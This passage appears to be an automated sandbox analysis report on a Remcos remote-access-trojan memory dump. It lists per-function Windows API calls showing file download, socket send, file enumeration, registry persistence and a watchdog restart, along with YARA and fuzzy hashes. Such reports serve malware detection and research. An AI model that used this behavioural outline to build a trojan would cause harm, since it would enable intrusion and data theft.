                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • GetTickCount.KERNEL32 ref: 0040D33C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,?,?,00000000), ref: 0040D39C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000,?,?,00000000), ref: 0040D3AC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3BC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3CC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,?,?), ref: 0040D3DC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040D3E6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004C), ref: 0040D402
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D40E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D41A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D426
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D432
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D43E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D44A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D456
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D462
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D474
                                        • atoi.MSVCRT ref: 0040D47B
                                        • Sleep.KERNEL32(00000064), ref: 0040DD60
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040DD83
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DD95
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDB0
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040DDBB
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,00000000), ref: 0040DDDD
                                        • URLDownloadToFileW.URLMON(00000000,00000000), ref: 0040DDE5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDF9
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040DE0D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@CountD@1@@DownloadEventFileSleepTickV01@atoi
                                        • String ID: $$PowrProf.dll$SetSuspendState
                                        • API String ID: 2465730144-1158640710
                                        • Opcode ID: a592643a0f67e9985d49c2e10944373042e1fa232a67b57bda9df140d502bff0
                                        • Instruction ID: 8b97f5ae68acd249977ecc05ae4d1582f654e66521c0ff460722a1e21975d306
                                        • Opcode Fuzzy Hash: a592643a0f67e9985d49c2e10944373042e1fa232a67b57bda9df140d502bff0
                                        • Instruction Fuzzy Hash: D8529372900208EBDB04BBB1EC59AEE7768EF54305F10487EF512A70E2DF785A54CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040477E, Relevance: 88.8, APIs: 59, Instructions: 322filenetworkthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _EH_prolog.MSVCRT ref: 00404783
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000004,0041B310), ref: 004047A0
                                        • socket.WS2_32(00000000,00000001,00000006), ref: 004047B3
                                        • connect.WS2_32(00000000,0041B320,00000010), ref: 004047C2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,00000000,00000001,00000006), ref: 004047EB
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000000,00000001,00000006), ref: 004047F5
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                          • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                          • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                          • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                          • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                          • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040481B
                                        • _CxxThrowException.MSVCRT(00000001,00416FB8), ref: 0040483B
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404849
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404853
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040485D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404883
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040488D
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404894
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004048A3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004048C2
                                        • _CxxThrowException.MSVCRT(00000002,00416FB8), ref: 004048E8
                                        • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 004048F7
                                        • wcscmp.MSVCRT ref: 00404924
                                        • wcscmp.MSVCRT ref: 0040493C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A24), ref: 00404961
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00404973
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00404983
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404991
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040499D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049AC
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049BE
                                          • Part of subcall function 00404C0A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                          • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                          • Part of subcall function 00404C0A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                          • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                          • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                          • Part of subcall function 00404C0A: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                          • Part of subcall function 00404C0A: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                          • Part of subcall function 00404C0A: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                          • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CCA
                                          • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CE2
                                          • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                          • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                          • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                          • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                          • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                        • _CxxThrowException.MSVCRT(00000003,00416FB8), ref: 004049E5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00416FB8), ref: 004049F0
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404A0A
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00404A1C
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A29
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A36
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404A51
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404A7E
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404A88
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404A94
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404AC0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404ACA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AF0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AFC
                                        • _CxxThrowException.MSVCRT(00000004,00416FB8), ref: 00404B1C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00416FB8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B27
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404B39
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 00404B56
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404B60
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                          • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                          • Part of subcall function 00402440: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                          • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024FF
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B78
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B81
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404B99
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BA2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BAB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BB4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BBD
                                        • atoi.MSVCRT ref: 00404B88
                                          • Part of subcall function 00404EA7: _EH_prolog.MSVCRT ref: 00404EAC
                                          • Part of subcall function 00404EA7: closesocket.WS2_32(?), ref: 00404EEE
                                          • Part of subcall function 00404EA7: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 00404F00
                                        • _CxxThrowException.MSVCRT(00000000,00000000), ref: 00404BD6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,0041B320,00000010,00000000,00000001,00000006), ref: 00404BDE
                                        • atoi.MSVCRT ref: 00404BE5
                                        • FindClose.KERNEL32(?), ref: 00404BF6
                                        • ExitThread.KERNEL32 ref: 00404BFE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$G@std@@$D@2@@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@Hstd@@V?$basic_string@$V10@0@$?begin@?$basic_string@D@2@@0@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@$?data@?$basic_string@A?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$??4?$basic_string@?empty@?$basic_string@?find@?$basic_string@ExitTerminateV12@Y?$basic_string@closesocketconnectsocket
                                        • String ID:
                                        • API String ID: 338953085-0
                                        • Opcode ID: 64b6d24a099f49f87b4da525077f38fde3800b06bfc63a19b21d2caf8c47ce30
                                        • Instruction ID: 4b461097a1424462df126d137943af890334f3d1b741e30b480b936ae2585c0a
                                        • Opcode Fuzzy Hash: 64b6d24a099f49f87b4da525077f38fde3800b06bfc63a19b21d2caf8c47ce30
                                        • Instruction Fuzzy Hash: B4C14072800609EBCB11FFA0DC49ADE777CEB54345F0041AAF506A71A1EB745B85CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A5F5, Relevance: 87.7, APIs: 40, Strings: 10, Instructions: 222sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 0040A5FE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,00000000), ref: 0040A611
                                          • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
                                          • Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
                                          • Part of subcall function 0040B829: RegCloseKey.ADVAPI32(?,?,00409CDD,80000001,00000000), ref: 0040B85C
                                        • OpenMutexA.KERNEL32 ref: 0040A63B
                                        • CloseHandle.KERNEL32(00000000), ref: 0040A64A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A68C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A69C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 0040A6B6
                                          • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                          • Part of subcall function 0040B4C8: RegQueryValueExA.ADVAPI32(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                          • Part of subcall function 0040B4C8: RegCloseKey.ADVAPI32(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 0040A6E2
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                          • Part of subcall function 0040A8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,0040A86F), ref: 0040A8DC
                                          • Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
                                          • Part of subcall function 0040A8CE: CloseHandle.KERNEL32(00000000,?,0040A86F), ref: 0040A8EE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
                                        • _wgetenv.MSVCRT ref: 0040A7B3
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A7BE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A7C9
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A7D5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7DE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7E7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 0040A882
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 0040A896
